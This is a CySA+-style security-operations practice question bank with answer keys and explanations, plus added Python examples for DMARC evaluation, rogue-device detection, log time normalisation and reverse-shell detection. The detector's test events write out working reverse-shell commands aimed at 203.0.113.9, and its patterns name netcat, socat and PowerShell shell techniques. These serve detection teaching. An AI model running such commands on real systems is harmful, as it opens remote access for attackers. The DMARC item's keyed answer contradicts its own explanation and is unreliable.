Which of the following options describe the benefits of reducing the attack surface and limiting access to sensitive resources? (Select the two best options.) A. It allows for greater transparency in network operations. B. It enhances the ability to detect and respond to anomalous activity. C. It helps to reduce the risk of unauthorized access to sensitive data. D. It promotes an increase in the availability of resources.
B. It enhances the ability to detect and respond to anomalous activity. C. It helps to reduce the risk of unauthorized access to sensitive data. Limiting access allows for more effective monitoring of network traffic, enhancing the ability to detect and respond to anomalous activity. Reducing the attack surface and limiting access to sensitive resources provide significant benefits to network security, such as reducing the risk of unauthorized access to sensitive data.
A company's security team recently discovered an unknown device connected to their network, and they suspect it could be a rogue device. The team wants to conduct scans and sweeps to locate and remove any unauthorized devices on the network. Which of the following are common types of scans or sweeps the team can use to locate rogue devices in the network? (Select the two best options.) A. Port scanning B. Passive scanning C. Active scanning D. Network mapping
B. Passive scanning C. Active scanning Passive scanning is a method that listens to network traffic without actively sending traffic. It can detect rogue devices that are active on the network but not responding to standard requests. Active scanning is a method that sends traffic to a network to identify devices that are active on the network. It is an effective method for identifying rogue devices actively responding to requests.
A security analyst performing security operations on a company's network needs to use PowerShell and shell scripts to automate tasks and streamline processes. Which of the following correctly defines PowerShell and shell script in the context of security operations? A. PowerShell is a set of commands written in a specific language that runs on a Unix-based operating system, while a shell script is a command-line interface that allows you to manage and automate Windows-based operating systems. B. PowerShell is a command-line interface that allows the user to manage and automate Windows-based operating systems, while a shell script is a set of commands written in a specific language that runs on a Unix-based operating system. C. PowerShell and shell script are two different names for the same thing - a command-line interface that allows you to manage and automate operating systems. D. PowerShell and shell script ar
B. PowerShell is a command-line interface that allows the user to manage and automate Windows-based operating systems, while a shell script is a set of commands written in a specific language that runs on a Unix-based operating system. PowerShell facilitates the management and automation of Windows-based operating systems by providing a command-line interface. A shell script is a set of commands written in a specific language that runs on a Unix-based operating system. Although PowerShell and shell scripts are both tools that automate tasks, they are not interchangeable and require different approaches to accomplish similar tasks.
A security analyst working for a large financial institution is implementing Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM) to improve email security for the company. Which of the following statements best describes SPF? A. SPF is a cryptographic protocol that ensures message confidentiality. B. SPF is an email authentication method that detects forged sender addresses in emails. C. SPF is a protocol used to encrypt email messages in transit. D. SPF is a protocol used to control access to network resources.
B. SPF is an email authentication method that detects forged sender addresses in emails. SPF is an email authentication method that detects forged sender addresses in emails. SPF verifies that the IP address of the sending mail server matches the IP address specified in the DNS record for the domain from which the email originated.
A cybersecurity analyst for a small company ensures the company's email security by configuring Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM). The analyst needs to explain to other employees how SPF and DKIM work together. Which of the following statements correctly explain the role of SPF and DKIM in securing email communications? (Select the two best options.) A. SPF verifies the message content while DKIM verifies the source IP address of incoming messages. B. SPF verifies the source IP address of incoming messages while DKIM verifies the message content. C. SPF and DKIM together prevent email spoofing and ensure message authenticity. D. SPF and DKIM work together to scan for malware.
B. SPF verifies the source IP address of incoming messages while DKIM verifies the message content. C. SPF and DKIM together prevent email spoofing and ensure message authenticity. SPF verifies the source IP address of incoming messages, while DKIM verifies the message content by attaching a digital signature to the email header. Together, they provide a strong defense against email forgery and ensure that email messages are legitimate and trustworthy. Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM) are both email authentication protocols that work together to protect against email spoofing and ensure message authenticity.
An IT security analyst is verifying a coworker's email containing a link to a new report. The email seems legitimate, but the analyst notices that the link is obfuscated, suggesting it may be part of a social engineering attack designed to compromise the organization's security. What is the role of obfuscated links in social engineering attacks, and how do they impact IT security operations? (Select the three best options.) A. Obfuscated links are hyperlinks that have been intentionally broken to disrupt the flow of traffic and deny access to specific webpages. B. Social engineering attacks rely on human interaction to trick individuals into revealing sensitive information or performing actions that compromise network security. C. Obfuscated links are hyperlinks intentionally obscured to hide the true destination of the link, often used in phishing attacks. D. Social engineering attacks often use obfuscated l
B. Social engineering attacks rely on human interaction to trick individuals into revealing sensitive information or performing actions that compromise network security. C. Obfuscated links are hyperlinks intentionally obscured to hide the true destination of the link, often used in phishing attacks. D. Social engineering attacks often use obfuscated links to redirect users to malicious websites that install malware or steal login credentials. Social engineering attacks rely on the exploitation of human vulnerabilities, such as trust and curiosity, to gain unauthorized access to sensitive information or networks. Attackers often use obfuscated links in social engineering phishing attacks to trick users into clicking a link that leads to a fake website designed to steal personal information. Attackers also use obfuscated links in social engineering attacks to redirect users to malicious websites that can infect their devices with malware or steal login credentials.
While looking into malware discovered on several workstations, an incident responder realizes it all came from new USB drives the company had recently procured. This could be an example of what type of attack? A. Data enrichment B. Supply chain C. Cousin domain D. Active defense
B. Supply chain Supply chain attacks involve identifying vendors and suppliers and leveraging them to gain access to an organization. Embedding malware into hardware or software an organization uses is an example of a supply chain attack.
A security analyst discovers a malicious process running on one of the servers exfiltrating data to an external IP address. The process has not been detected by the antivirus software. Which of the following is the most likely reason that the malicious process was able to exfiltrate data undetected by the antivirus software? A. The antivirus software was not up-to-date. B. The malicious process was disguised as a legitimate system file. C. The antivirus software was not configured to detect this type of threat. D. The antivirus software was disabled by the attacker.
B. The malicious process was disguised as a legitimate system file. The malicious process exfiltrated the data, and the software did not detect it because it appeared to be a legitimate system file. This is a technique commonly used by attackers to evade detection by security software.
A cybersecurity analyst investigates a suspicious process running on a server. The analyst discovers unexpected output and registry anomalies. Which of the following are true regarding unexpected output and registry anomalies during security operations? (Select the two best options.) A. Unexpected output can be a result of incorrect command syntax. B. Unexpected output can indicate malware activity. C. Registry anomalies can be caused by legitimate software updates. D. Registry anomalies always indicate a security breach.
B. Unexpected output can indicate malware activity. C. Registry anomalies can be caused by legitimate software updates. Malware often tries to conceal its presence on a system by modifying the system's behavior, which can result in unexpected output. Some software installs or updates may modify the Windows registry to change settings or add new ones, causing registry anomalies.
A medium-sized business collects and analyzes all security-related logs from various sources, including web servers and payment processing systems, to detect and respond to security incidents in real time. By implementing centralized logging, the organization hopes to enhance its ability to prevent and mitigate cyber-attacks, as well as comply with regulatory requirements. Which of the following statements accurately describe the role of centralized logging in cyber security operations? A. Centralized logging provides a way for attackers to bypass security measures and access sensitive information. B. Centralized logging makes it difficult for security personnel to monitor system activity. C. Centralized logging allows security personnel to track and analyze system activity, detect potential security incidents, and respond quickly to threats. D. Centralized logging only benefits large organizations with complex
C. Centralized logging allows security personnel to track and analyze system activity, detect potential security incidents, and respond quickly to threats. Centralized logging is a critical component of a comprehensive cyber security strategy. Consolidating log data from multiple sources, such as servers, firewalls, and network devices, enables security personnel to quickly identify and investigate potential security incidents, as well as monitor system activity in real time.
How are cloud system and network architecture concepts essential for securing hybrid and on-premises systems? A. Cloud system and network architecture concepts are optional and not necessary for securing hybrid and on-premises systems. B. Cloud system and network architecture concepts make securing hybrid and on-premises systems more complex and difficult. C. Cloud system and network architecture concepts enable organizations to consolidate and streamline their security operations, regardless of where their data resides. D. Cloud system and network architecture concepts only apply to cloud-based systems and do not provide any benefits for on-premises systems.
C. Cloud system and network architecture concepts enable organizations to consolidate and streamline their security operations, regardless of where their data resides. Cloud system and network architecture concepts provide a unified security framework that applies across hybrid and on-premises systems, enabling organizations to streamline their security operations.
A security analyst is responsible for ensuring a company's serverless infrastructure is secure. Recently, the company had a data breach due to a misconfigured serverless function. Which security measure should the analyst implement to prevent future data breaches on the company's serverless infrastructure? A. Implement network segmentation B. Deploy a firewall C. Configure access control D. Use intrusion detection system (IDS) to monitor functions
C. Configure access control Configuring access control on serverless functions is essential to prevent unauthorized access to the company's data.
A cybersecurity analyst for a large financial services company reviews the company's email security controls and is concerned about the risk of phishing attacks. The analyst decides to implement Domain-based Message Authentication, Reporting, and Conformance (DMARC) to better protect the company's email domain. Which of the following best describes the correlation between embedded links and DMARC? A. DMARC protects against phishing attacks that use embedded links by analyzing email headers. B. DMARC prevents embedded links from being included in emails altogether. C. DMARC verifies the authenticity of embedded links by checking the sender's domain against the DMARC record. D. DMARC only applies to email messages that contain embedded links from untrusted senders.
C. DMARC verifies the authenticity of embedded links by checking the sender's domain against the DMARC record. Strictly speaking, Domain-based Message Authentication, Reporting, and Conformance (DMARC) never inspects links or any other part of the message body. It is a policy layer over SPF and DKIM: the receiving server checks that the message passed SPF or DKIM and that the authenticated domain aligns with the domain in the visible From: header, then applies the policy the sending domain publishes in its _dmarc TXT record (none, quarantine, or reject). The connection to embedded links is indirect. Phishing that carries malicious links usually spoofs a trusted From: domain to make the link credible, and a domain with a reject policy lets receivers discard such mail before the recipient ever sees the link. Messages sent from look-alike domains the attacker legitimately controls, or from a compromised mailbox inside the authorized domain, still pass DMARC, so link inspection and user awareness remain separate controls.
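The following is an added example, not part of the CySA+ module text: a minimal DMARC evaluator that parses a published _dmarc TXT record and applies SPF/DKIM identifier alignment. The records, domains and authentication results are constructed for illustration, and the organizational-domain logic is a simplification (a real implementation uses the Public Suffix List). Notice what is absent: nothing here ever looks at a message body or its links.

```python
# Added example, not part of the CySA+ module. Constructed records and results.
from typing import Optional


def parse_dmarc(txt: str) -> dict:
    """Parse 'v=DMARC1; p=reject; adkim=s; aspf=r' into a tag dictionary."""
    tags = {}
    for part in txt.split(";"):
        part = part.strip()
        if not part:
            continue
        key, _, value = part.partition("=")
        tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1" or "p" not in tags:
        raise ValueError("not a valid DMARC record")
    # RFC 7489 defaults: relaxed alignment for both identifiers.
    tags.setdefault("adkim", "r")
    tags.setdefault("aspf", "r")
    return tags


def org_domain(domain: str) -> str:
    """Organizational domain. Simplification: the last two labels only;
    a real implementation consults the Public Suffix List (e.g. co.uk)."""
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])


def aligned(from_domain: str, auth_domain: str, mode: str) -> bool:
    """Strict ('s') alignment needs an exact match with the From: domain;
    relaxed ('r') only needs the same organizational domain."""
    if mode == "s":
        return from_domain.lower() == auth_domain.lower()
    return org_domain(from_domain) == org_domain(auth_domain)


def evaluate_dmarc(record: str, from_domain: str,
                   spf_pass_domain: Optional[str],
                   dkim_pass_domain: Optional[str]) -> str:
    """Return 'pass', or the requested action ('none', 'quarantine',
    'reject') when neither SPF nor DKIM produced an aligned pass.

    spf_pass_domain:  MAIL FROM domain for which SPF passed, or None.
    dkim_pass_domain: d= domain of a DKIM signature that verified, or None.
    """
    tags = parse_dmarc(record)
    spf_ok = spf_pass_domain is not None and aligned(
        from_domain, spf_pass_domain, tags["aspf"])
    dkim_ok = dkim_pass_domain is not None and aligned(
        from_domain, dkim_pass_domain, tags["adkim"])
    return "pass" if (spf_ok or dkim_ok) else tags["p"]


if __name__ == "__main__":
    record = "v=DMARC1; p=reject; adkim=s; aspf=r; rua=mailto:dmarc@example.com"
    # Legitimate mail whose bounce address is on a subdomain: relaxed SPF aligns.
    print(evaluate_dmarc(record, "example.com", "bounce.example.com", None))
    # Spoofed From: example.com; SPF passed only for the attacker's own envelope.
    print(evaluate_dmarc(record, "example.com", "attacker.net", None))
```

The second case is the phishing scenario the question has in mind: SPF genuinely passes for attacker.net, but that domain is not aligned with the spoofed From: header, so the receiver applies p=reject and the embedded link never reaches the user. A message from a look-alike domain with its own valid DMARC would pass this function, which is the caveat above.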
A security analyst reviews the logs of a web server for suspicious activity and notices that someone sent a message to the server with a header that had unusual metadata. Which of the following statements best explains the difference between hashing and headers in security operations? A. Hashing generates unique digital representations of data, while headers encrypt the data. B. Hashing and headers both add metadata to data packets, but hashing only adds metadata to the header, while headers add metadata to the entire packet. C. Hashing generates unique digital representations of data, while headers add metadata to a message or data packet. D. Hashing and headers both identify the location of a message or data packet in a network.
C. Hashing generates unique digital representations of data, while headers add metadata to a message or data packet. Hashing, a process used in security operations, creates a unique digital representation of data. Headers contain information such as the source and destination of the message, the type of data someone is sending, and other information relevant to the transmission of the data.
What are the security benefits of using software-defined networking (SDN) and virtualization in a network environment? (Select the two best options.) A. Enhanced network security through hardware-based firewalls B. Improved network performance through optimized routing C. Increased network agility for faster deployment of security controls D. Simplified network segmentation and isolation for easier threat containment
C. Increased network agility for faster deployment of security controls D. Simplified network segmentation and isolation for easier threat containment SDN separates the control plane from the forwarding hardware, so filtering rules and segmentation policies can be pushed programmatically across the whole network instead of through per-device changes, which lets the team deploy security controls and respond to threats much faster. Combined with virtualization, this makes it straightforward to carve the network into small isolated segments and to quarantine a compromised host or workload, which contains threats more easily. The benefit comes from software-defined controls, not from hardware-based firewalls, and improved routing performance is not a security benefit.
A company hires a new employee to work in their IT department. The new employee quickly gains the trust of the other coworkers. However, the company soon notices someone is accessing files without authorization and leaking sensitive information. Which of the following best describes the security threat presented in this scenario? A. Social engineering attack B. Phishing attack C. Insider threat D. Malware attack
C. Insider threat This scenario is most reflective of an insider threat, which is someone who uses their position within a company to gain unauthorized access to information or systems.
A security analyst is conducting security operations for a company's network and notices that some users have complained about slow performance and high memory consumption on their devices. Which of the following is a potential cause of high memory consumption? A. Running multiple applications at the same time B. Running outdated operating system software C. Installing software from unverified sources D. Having insufficient disk space on the device
C. Installing software from unverified sources Installing software from unverified sources can introduce malware or other harmful programs that consume significant system resources, leading to slow performance and high memory consumption on devices.
A security team found an unidentified device linked to the company's network. The team believes that the device could be a rogue one, and they intend to perform scans and sweeps to identify and eliminate any unauthorized devices on the network. Which two options are the most effective methods of scans or sweeps used to detect rogue devices on a network? (Select the two best options.) A. Port scanning B. Network mapping C. Passive scanning D. Active scanning
C. Passive scanning D. Active scanning Passive scanning is a method that listens to network traffic without actively sending traffic. It can detect rogue devices that are active on the network but not responding to standard requests. Active scanning is a method that sends traffic to a network to identify devices that are active on the network. It is an effective method for identifying rogue devices actively responding to requests.
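As an added example (not part of the CySA+ module), the following Python correlates what passive listening and an active sweep each observed against an asset inventory. The log line format, the scan results, the inventory and the MAC addresses are all constructed for illustration; the point is that the two methods find different devices, and that a device seen only passively is the one most worth chasing.

```python
# Added example, not part of the CySA+ module. All data below is constructed.
import re

# Constructed log format resembling "ip=<addr> mac=<addr>" pairs from an
# ARP/DHCP watcher; it is not any particular tool's real output format.
PASSIVE_LINE = re.compile(
    r"ip=(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+mac=(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE,
)


def parse_passive(lines):
    """Return {mac: ip} for every address pair seen in passive log lines."""
    seen = {}
    for line in lines:
        m = PASSIVE_LINE.search(line)
        if m:
            seen[m["mac"].lower()] = m["ip"]
    return seen


def find_rogues(passive, active, inventory):
    """passive, active: {mac: ip} gathered by listening and by an active sweep.
    inventory: iterable of authorized MAC addresses.
    Returns (rogues, silent): MACs absent from the inventory, and the subset
    that was only seen passively, i.e. never answered the active sweep."""
    authorized = {m.lower() for m in inventory}
    active = {m.lower(): ip for m, ip in active.items()}
    observed = set(passive) | set(active)
    rogues = observed - authorized
    silent = rogues - set(active)
    return sorted(rogues), sorted(silent)


if __name__ == "__main__":
    passive_log = [  # constructed
        "2024-03-01T08:00:01Z arp ip=10.0.5.12 mac=00:11:22:33:44:55",
        "2024-03-01T08:00:07Z arp ip=10.0.5.200 mac=de:ad:be:ef:00:01",
        "2024-03-01T08:00:09Z arp ip=10.0.5.13 mac=00:11:22:33:44:56",
    ]
    # Constructed active-sweep results: only hosts that answered probes.
    active_sweep = {"00:11:22:33:44:55": "10.0.5.12",
                    "AA:BB:CC:DD:EE:FF": "10.0.5.77"}
    inventory = ["00:11:22:33:44:55", "00:11:22:33:44:56"]
    rogues, silent = find_rogues(parse_passive(passive_log), active_sweep, inventory)
    print("unknown devices:", rogues)
    print("unknown and not answering probes:", silent)
```

The device at 10.0.5.200 never answers the sweep, so an active-only approach would miss it entirely; the device at 10.0.5.77 answers probes but was quiet during the passive window. Using both methods, and comparing against an inventory that is actually maintained, is what makes the result reliable.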
An analyst is reviewing alerts in the security information and events manager (SIEM). Which of the following might lead them to suspect there has been malicious activity? A. Data enrichment B. APIs C. Reverse shell D. Active defense
C. Reverse shell A reverse shell causes a victim system to initiate a shell session with the attacker's host. Reverse shell activity is unlikely to be legitimate, and the analyst should always investigate.
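The following is an added example, not part of the CySA+ module: a small process-creation detector for the reverse-shell patterns an analyst would look for in SIEM alerts. The events are constructed dictionaries in the shape of a parsed EDR or Sysmon "process create" record (parent image, image, command line); the field names, the command lines and the IP address are this example's own assumptions.

```python
# Added example, not part of the CySA+ module. Events and field names are
# constructed; real EDR/Sysmon records need a thin mapping onto this shape.
import re

SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe"}
# Services that should never need to spawn an interactive shell.
NETWORK_FACING = {"httpd", "apache2", "nginx", "php-fpm", "tomcat", "java", "w3wp.exe"}

# Command-line patterns that almost never occur in legitimate administration.
PATTERNS = [
    (re.compile(r"/dev/tcp/"), "bash network redirection (/dev/tcp)"),
    (re.compile(r"\b(nc|ncat|netcat)\b[^|;]*\s-e\s"), "netcat -e"),
    (re.compile(r"socket\.socket\(.*\.connect\(", re.S), "scripted socket connect"),
    (re.compile(r"mkfifo\s+\S+.*\|\s*(sh|bash)\b", re.S), "named-pipe shell"),
    (re.compile(r"\bsocat\b.*exec:", re.I), "socat exec"),
    (re.compile(r"Net\.Sockets\.TCPClient", re.I), "PowerShell TCPClient"),
]


def basename(path):
    """Last path component, case-folded, for both / and \\ separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event):
    """Return the reasons an event looks like a reverse shell.
    An empty list means nothing suspicious was found."""
    image = basename(event["image"])
    parent = basename(event["parent_image"])
    cmd = event["cmdline"]
    reasons = []
    # A shell spawned by a web or app server: classic post-exploitation
    # of a web application, regardless of what the command line says.
    if image in SHELLS and parent in NETWORK_FACING:
        reasons.append(f"shell {image} spawned by network-facing {parent}")
    for pattern, label in PATTERNS:
        if pattern.search(cmd):
            reasons.append(label)
    return reasons


if __name__ == "__main__":
    events = [  # constructed
        {"parent_image": "/usr/sbin/apache2", "image": "/bin/sh",
         "cmdline": "sh -c 'bash -i >& /dev/tcp/203.0.113.9/4444 0>&1'"},
        {"parent_image": "/usr/bin/bash", "image": "/usr/bin/python3",
         "cmdline": "python3 -c 'import socket,os;s=socket.socket();"
                    "s.connect((\"203.0.113.9\",4444));os.dup2(s.fileno(),0)'"},
        {"parent_image": "/usr/bin/bash", "image": "/usr/bin/ssh",
         "cmdline": "ssh admin@jump.internal"},
    ]
    for e in events:
        print(e["image"], "->", classify(e) or "clean")
```

The parent-child check is the more durable signal: command lines can be obfuscated or base64-encoded, but a web server process spawning /bin/sh is anomalous on its own. Pattern rules like these still need tuning per environment, since build systems and monitoring agents occasionally produce similar command lines.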
An analyst working for a financial institution has implemented both security orchestration, automation, and response (SOAR) and security information and events manager (SIEM) solutions to enhance their security posture. The analyst receives an alert from the SIEM solution about a potential security threat, and the SOAR solution is triggered to respond to the incident. What is the key difference between SOAR and SIEM solutions in a security operations environment, as shown in the scenario above? A. SOAR solutions are for network traffic monitoring, while SIEM solutions are for incident response. B. SOAR solutions are for threat intelligence analysis, while SIEM solutions are for vulnerability assessment. C. SOAR solutions are for automated incident response, while SIEM solutions are for collecting and analyzing security data. D. SOAR solutions are for user authentication, while SIEM solutions are for data encrypti
C. SOAR solutions are for automated incident response, while SIEM solutions are for collecting and analyzing security data. The security information and event management (SIEM) solution collects and correlates log and event data from across the environment and raises the alert; the security orchestration, automation, and response (SOAR) solution takes that alert and executes a playbook (enrich the indicators, isolate the host, open a ticket, notify the analyst) with little or no manual intervention. In short, SIEM is for collecting and analyzing security data, and SOAR is for orchestrating and automating the response to what the SIEM finds.
A threat actor stole 1,000 credit card numbers from an online retailer. Where might the actor try to sell these records? A. CSIRT B. ISACs C. The deep/dark web D. OSINT
C. The deep/dark web The deep/dark web provides cybercriminals and other malicious actors a platform to conduct illicit activity like planning upcoming attacks, exchanging information, and selling stolen goods.
A company's IT security team discovers that one of their servers is experiencing a significant increase in drive capacity consumption. Upon investigating, the team identifies several malicious processes running in the background. Which of the following best explains the relationship between drive capacity consumption and malicious processes in this scenario? A. The server's drive capacity consumption is causing the malicious processes to run in the background, potentially due to insufficient storage space. B. The malicious processes and the increased drive capacity consumption are unrelated, and the issue could be caused by a hardware failure. C. The malicious processes are causing the server to use up more drive capacity than usual, potentially for data exfiltration purposes. D. The server's operating system is corrupted, causing both the increased drive capacity consumption and the malicious processes to occur.
C. The malicious processes are causing the server to use up more drive capacity than usual, potentially for data exfiltration purposes. Malware commonly stages data locally before exfiltration, for example by copying collected files into compressed archives or accumulating keystroke and screen captures, and some tools also write large volumes of downloaded payloads or logs. An unexplained jump in disk use that coincides with unknown processes therefore points to compromise rather than to hardware failure, and the team should identify which files those processes are writing and preserve them before remediation.
Which of the following are true about the importance of time synchronization, configuration file locations, and logging files in security operations? (Select the two best options.) A. Configuration file locations are typically easy to find and are consistent across different operating systems. B. Time synchronization is only important for Windows-based operating systems. C. Time synchronization is crucial for ensuring consistency in event logs. D. Logging files can provide valuable information for identifying and investigating security incidents.
C. Time synchronization is crucial for ensuring consistency in event logs. D. Logging files can provide valuable information for identifying and investigating security incidents. Time synchronization is important because it accurately records events in the correct order across all systems and devices, which is critical for forensic analysis of security incidents. Logging files can provide important information for identifying and investigating security incidents, including information on system and user activity, network traffic, and more.
A security analyst at a financial institution plans to use PowerShell and XML to secure an organization's servers. What is the primary purpose of using XML in this context, and how can PowerShell help in securing the servers? A. XML encrypts sensitive data on the servers, while PowerShell automates security-related tasks on the servers. B. XML detects security threats on the servers, while PowerShell monitors server logs for suspicious activity. C. XML provides a common format for exchanging data between systems, while PowerShell helps automate server hardening and configuration tasks. D. XML manages server configurations, while PowerShell authenticates users who access the servers.
C. XML provides a common format for exchanging data between systems, while PowerShell helps automate server hardening and configuration tasks. Extensible Markup Language (XML) describes, stores, and transmits data. PowerShell is a scripting language that automates server hardening and configuration tasks such as managing user accounts, configuring firewalls, and performing system maintenance tasks.
Which of the following is a reason why time synchronization is important in security operations? A. To maintain system performance B. To prevent unauthorized access to sensitive data C. To improve network throughput D. To ensure accurate timestamps on security-related events
D. To ensure accurate timestamps on security-related events Accurate timestamps are critical for forensic analysis of security events and correlating events across systems.
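The two time-synchronization questions above make the same point: events from different systems can only be correlated once their timestamps are on a common clock. As an added example (not part of the CySA+ module), the following Python normalizes constructed log lines from hosts that log in different time zone offsets, corrects one host whose clock is known to run fast, and orders the events. The line format, hostnames, messages and the 90-second skew are all assumptions made for this example.

```python
# Added example, not part of the CySA+ module. Log lines and skew are constructed.
import re
from datetime import datetime, timedelta, timezone

# Constructed line format: "<host> <ISO-8601 timestamp with offset> <message>".
LINE = re.compile(r"^(?P<host>\S+)\s+(?P<ts>\S+)\s+(?P<msg>.*)$")


def parse_ts(raw):
    """Parse an ISO-8601 timestamp into UTC; a trailing 'Z' is accepted.
    A timestamp with no offset is rejected, because it cannot be placed on
    a common clock without knowing the host's configured time zone."""
    dt = datetime.fromisoformat(raw.replace("Z", "+00:00"))
    if dt.tzinfo is None:
        raise ValueError(f"timestamp without offset cannot be correlated: {raw}")
    return dt.astimezone(timezone.utc)


def normalize(lines, skew_seconds=None):
    """Return events as (utc_time, host, msg) sorted by corrected UTC time.
    skew_seconds maps host -> seconds its clock runs fast (negative if slow),
    as measured against the NTP reference; it is subtracted to recover the
    true time of the event."""
    skew_seconds = skew_seconds or {}
    events = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        t = parse_ts(m["ts"]) - timedelta(seconds=skew_seconds.get(m["host"], 0))
        events.append((t, m["host"], m["msg"]))
    return sorted(events)


def event_order(lines, skew_seconds=None):
    """Hostnames in corrected chronological order, for a quick sanity check."""
    return [host for _, host, _ in normalize(lines, skew_seconds)]


if __name__ == "__main__":
    log = [  # constructed
        "web01 2024-03-01T10:00:02+02:00 POST /login user=alice",
        "db01  2024-03-01T03:00:05-05:00 SELECT * FROM users WHERE name='alice'",
        "fw01  2024-03-01T08:01:30Z ALLOW 203.0.113.9 -> 10.0.5.12:22",
    ]
    print("as logged:", event_order(log))
    # fw01 was measured 90 s ahead of the NTP reference during the investigation.
    for t, host, msg in normalize(log, {"fw01": 90}):
        print(t.isoformat(), host, msg)
```

Read naively, the firewall's inbound SSH entry appears to come more than a minute after the web login and database query; with the measured skew removed it is the first event, which changes the story of the incident from "a login followed by unrelated traffic" to "a remote connection preceded the login". Recording the skew and the offsets used is part of the forensic record.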
A security analyst working for a financial institution notices abnormal behavior in a workstation's operating system (OS) and identifies multiple unauthorized scheduled tasks and file system anomalies on the affected workstation. Which of the following options is the most likely explanation for these issues? A. The operating system of the workstation is outdated, and the security patches have not been applied, leading to system vulnerabilities that have been exploited. B. An insider threat with access to the workstation is intentionally creating these abnormalities to sabotage the company's security posture. C. The security analyst is experiencing false positives from their security tools, and there are no actual anomalies present. D. A virus has infected the workstation, allowing remote attackers to execute arbitrary code and run malicious tasks.
D. A virus has infected the workstation, allowing remote attackers to execute arbitrary code and run malicious tasks. Unauthorized scheduled tasks are a common persistence mechanism, and file system anomalies such as new executables in temporary or user-writable directories or modified system binaries are consistent with malware that has been installed and is giving remote attackers the ability to execute arbitrary code on the workstation. Missing patches alone would explain how the workstation was exposed but not the artifacts observed, and an insider or tool false positives are less likely explanations for this specific combination of indicators.
A security analyst needs to select an appropriate tool to detect and analyze malware in an organization's network. The analyst needs to decide which tool is best for detecting and analyzing malware through virtualized environments. Which of the following tools can be used to detect and analyze malware through virtualized environments? A. Wireshark B. Snort C. Malwarebytes D. Cuckoo Sandbox
D. Cuckoo Sandbox Cuckoo Sandbox specifically detects and analyzes malware in a safe and isolated environment. Cuckoo Sandbox is an open-source software for automating malware analysis in a virtualized environment.
An organization's security team is conducting routine system checks and discovers an unauthorized scheduled task on a critical server. Further investigation reveals that the task is set to run every hour, and the task is not part of any known system or application updates. What is the best course of action for the security team to take in response to the unauthorized scheduled task on the critical server? A. Allow the task to run and gather more information before taking any action B. Immediately shut down the critical server to prevent any further unauthorized access C. Schedule a maintenance window to investigate the task at a later time D. Disable the task and monitor the server for any further suspicious activity
D. Disable the task and monitor the server for any further suspicious activity To stop the recurring execution while keeping the server available, the security team should disable the unauthorized scheduled task and watch the server for follow-on activity. Before disabling it, the team should record the task definition, its command line and the binary or script it launches, and preserve copies for forensic analysis. Letting the task keep running risks further damage, postponing the investigation leaves the attacker's foothold in place, and shutting the server down destroys volatile evidence and disrupts a critical service.
Which of the following is the most important reason to implement system hardening measures in a networked environment? A. To prevent denial-of-service attacks B. To secure data in transit between systems C. To ensure system performance remains optimal D. To reduce the risk of data breaches
D. To reduce the risk of data breaches System hardening measures like removing unnecessary software and services, disabling default accounts, and applying patches and updates help reduce the attack surface of a system and directly reduce the risk of data breaches.
A cybersecurity analyst at a company notices an unusual spike in network traffic that leads to service interruptions. The analyst suspects that this may be due to a security breach. Why could these service interruptions be an indicator of a security breach? A. Service interruption is usually caused by power outages or hardware failures. B. Service interruption is often the result of user error, such as misconfiguration of network devices. C. Service interruption might be caused by routine maintenance tasks that require temporarily taking down the system. D. Service interruption could indicate an attacker using a denial-of-service attack to overload the network.
D. Service interruption could indicate an attacker using a denial-of-service attack to overload the network. A denial-of-service (DoS) attack floods a network or service with more traffic or requests than it can handle, so a sudden, unexplained traffic spike that coincides with outages is a classic indicator. The other options describe benign causes of interruption, which is why the analyst should confirm the source and pattern of the traffic (many sources, repetitive requests, no matching change or maintenance record) before concluding that an attack is underway.
A security analyst investigates a suspected network attack on a company's server. The analyst needs to capture and analyze network traffic to identify the source and type of attack. The analyst decides to use tcpdump and Wireshark for the analysis. Which of the following statements is true about tcpdump and Wireshark when used for network traffic analysis in a security investigation? A. Tcpdump is a network traffic capture tool that identifies the source and type of an attack, while Wireshark is a network traffic analysis tool that visualizes and filters captured traffic. B. Wireshark is a network traffic capture tool that identifies the source and type of an attack, while Tcpdump is a network traffic analysis tool that visualizes and filters captured traffic. C. Tcpdump and Wireshark are both network traffic analysis tools that can be used to visualize and filter captured traffic, but cannot be used to identify t
D. Tcpdump and Wireshark are both network traffic capture and analysis tools that identify the source and type of an attack. Tcpdump and Wireshark capture and analyze network traffic, allowing the identification of the source and type of attacks. Tcpdump captures and displays network traffic through the command-line, while Wireshark offers a more advanced graphical interface to capture and analyze packets, facilitating deep inspection of captured traffic.
An organization has chosen to automatically ingest indicators. This action is most likely intended to ensure what desired threat intelligence attribute? A. Relevancy B. Accuracy C. APT D. Timeliness
D. Timeliness Timeliness is the speed at which the system collects and disseminates threat intelligence. Information rapidly disseminated is timely. This helps ensure it is up-to-date and remains maximally useful.
What is the benefit of hardening the operating system in the context of system and network architecture? A. To increase the number of software applications that can be run on the system B. To reduce the speed of system performance due to the extra security measures C. To improve the aesthetics of the graphical user interface (GUI) D. To decrease the risk of unauthorized access to sensitive data
D. To decrease the risk of unauthorized access to sensitive data Hardening the operating system means configuring it to minimize its attack surface: removing or disabling unneeded services and default accounts, applying patches, enforcing least-privilege permissions and access controls, and enabling host-based protections such as a host firewall and audit logging. Together these measures significantly reduce the risk of unauthorized access to sensitive data; they add no applications, and any performance cost is a side effect rather than a goal.
A script kiddie is most likely to conduct which of the following operations? A. Setting up a watering hole to steal the login credentials for online bank accounts B. Monitoring the email communications of two European Prime Ministers C. Defacing the website of a prominent global oil company D. Using multiple unsophisticated scanning tools against a public-facing website
D. Using multiple unsophisticated scanning tools against a public-facing website Script kiddie refers to an unsophisticated actor who uses readily available hacker tools. Often a script kiddie has a limited understanding of the tools they are using.
Which of the following is a significant difference between containerization and virtualization in the context of security operations? A. Containerization provides a higher level of isolation between the container and the host operating system compared to virtualization. B. Virtualization provides faster resource allocation than containerization. C. Containerization enables multiple operating systems to run on a single physical machine, while virtualization does not. D. Virtualization enables multiple operating systems to run on a single physical machine, while containerization does not.
